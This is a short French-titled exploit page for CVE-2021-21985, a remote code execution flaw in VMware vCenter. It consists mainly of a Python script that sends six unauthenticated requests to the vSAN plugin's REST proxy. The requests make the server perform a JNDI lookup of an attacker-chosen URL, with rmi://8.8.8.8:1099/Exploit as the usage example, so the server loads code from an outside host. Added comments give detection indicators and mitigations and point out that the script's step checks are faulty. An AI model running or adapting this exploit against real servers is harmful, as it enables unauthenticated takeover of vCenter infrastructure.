CVE-2021-21985 Vulnérabilité d'exécution de code arbitraire à distance VMware vCenter


Capture d'écran

Twitter E3CB24AUUAEl1 8.jpg


EXP

import requests
import sys
import json
def send_request(host,uri,json):
    """POST one JSON body to ``host + baseuri + uri`` and return the reply text.

    ``baseuri`` and ``headers`` are module-level names assigned in the
    ``__main__`` section; this function does not define them itself.
    The request carries no credentials or session cookie: the only headers
    sent are those in ``headers``.

    Returns the response body as text, or ``False`` if anything raised.
    """
    try:
        endpoint = host + baseuri + uri
        # verify=False disables TLS certificate validation, so the peer's
        # identity is never checked and the reply cannot be authenticated.
        response = requests.post(
            url=endpoint,
            json=json,
            headers=headers,
            verify=False,
        )
        body = response.text
        return body
    except:
        # Every failure (connection error, bad URL, undefined global, ...) is
        # collapsed into False; the caller cannot tell them apart.
        return False
def check_false(request):
    """Report whether a step's response should be treated as a failure.

    Returns ``True`` (after printing "[*] No Vuln!") when ``request`` equals
    ``False`` or does not contain the substring ``result``; otherwise falls
    through and returns ``None``.

    Caveat for anyone reading this output as an assessment result: a
    transport error (``send_request`` returning ``False``) prints the same
    "No Vuln!" message as a body without ``result``, so that message is not
    evidence that a host is patched. Patch status should be confirmed from
    the product's build number against the vendor advisory.
    """
    if request == False:
        failed = True
    else:
        # Plain substring match on the raw response text, not a JSON parse.
        failed = 'result' not in request
    if not failed:
        return None
    print("[*] No Vuln!")
    return True
# Script entry point: sends six sequential JSON POSTs to the vSAN plugin's
# REST proxy endpoint of a vCenter host (CVE-2021-21985). No credentials,
# token or session cookie are attached to any of the requests.
#
# Defensive notes (derived from the values below):
#   * Log/proxy indicator: POST requests whose path contains
#     "ui/h5-vsan/rest/proxy/service/" followed by one of the method names in
#     `uris`, arriving in quick succession from one client.
#   * The User-Agent "pentest" is specific to this script and trivially
#     changed, so it is a weak indicator on its own.
#   * Request bodies are JSON objects with a "methodInput" key; one of them
#     names javax.naming.InitialContext.doLookup and another carries a URL
#     (rmi:// in the usage example). A JNDI lookup of that URL would make the
#     server open an outbound connection, so unexpected egress from vCenter
#     to RMI/LDAP-style services is worth alerting on.
#   * Mitigation: apply the vendor fix for CVE-2021-21985; keep the vCenter
#     management interface off untrusted networks and restrict its egress.
#     VMware also published a workaround that disables the affected plugin
#     where it is not in use -- confirm details against the vendor advisory.
if __name__ == '__main__':
    # NOTE(review): this guard only rejects a call with no arguments, yet
    # sys.argv[2] is read unconditionally below.
    if len(sys.argv) < 2:
        print('''python3 cve-2021-21985.py https://host rmi://8.8.8.8:1099/Exploit''')
        sys.exit()
    host = sys.argv[1]
    # Second argument is interpolated verbatim into the setArguments body.
    payload = sys.argv[2]
    # Module-level globals read by send_request().
    baseuri = "ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService"
    uris = ["/setTargetObject", "/setStaticMethod", "/setTargetMethod", "/setArguments", "/prepare", "/invoke"]
    headers = {'Content-Type': 'application/json', "User-Agent": "pentest"}
    # Pre-built request bodies, one per stage; each is a dict with a single
    # "methodInput" list.
    stage_setTargetObject = json.loads('{"methodInput":[null]}')
    stage_setStaticMethod = json.loads('{"methodInput":["javax.naming.InitialContext.doLookup"]}')
    stage_setTargetMethod = json.loads('{"methodInput":["doLookup"]}')
    # String-formatted into JSON text before parsing; the argument is not
    # escaped or validated.
    stage_setArguments = json.loads('{"methodInput":[["%s"]]}'%payload)
    stage_prepare = json.loads('{"methodInput":[]}')
    print("[*] start init TargetObject")
    # Step 1: POST to /setTargetObject with a null target.
    init_request  = send_request(host,uris[0],json=stage_setTargetObject)
    if check_false(init_request):
        print("[*] init failed!")
        exit()
    # NOTE(review): every check from here on re-tests init_request (the
    # step-1 response), not the response of the step just sent. The script's
    # per-step messages therefore say nothing about steps 2-6 and should not
    # be read as confirmation of anything beyond the first reply.
    # Step 2: POST to /setStaticMethod.
    StaticMethod = send_request(host,uris[1],json=stage_setStaticMethod)
    if check_false(init_request):
        print("[*] StaticMethod init failed!")
        exit()
    # Step 3: POST to /setTargetMethod (response stored in StaticMethod again).
    StaticMethod = send_request(host,uris[2],json=stage_setTargetMethod)
    if check_false(init_request):
        print("[*] setTarget Method failed!")
        exit()
    # Step 4: POST to /setArguments with the caller-supplied URL.
    # print(stage_setArguments)
    setArguments = send_request(host,uris[3],json=stage_setArguments)
    if check_false(init_request):
        print("[*] setArguments failstage_setArgumentsed!")
        exit()
    # Step 5: POST to /prepare with an empty methodInput list.
    setArguments = send_request(host,uris[4],json=stage_prepare)
    if check_false(init_request):
        print("[*] stage_prepare failed!")
        exit()
    # Step 6: POST to /invoke, reusing the same empty body as /prepare.
    setArguments = send_request(host,uris[5],json=stage_prepare)
    if check_false(init_request):
        print("[*] invoke failed!")
        exit()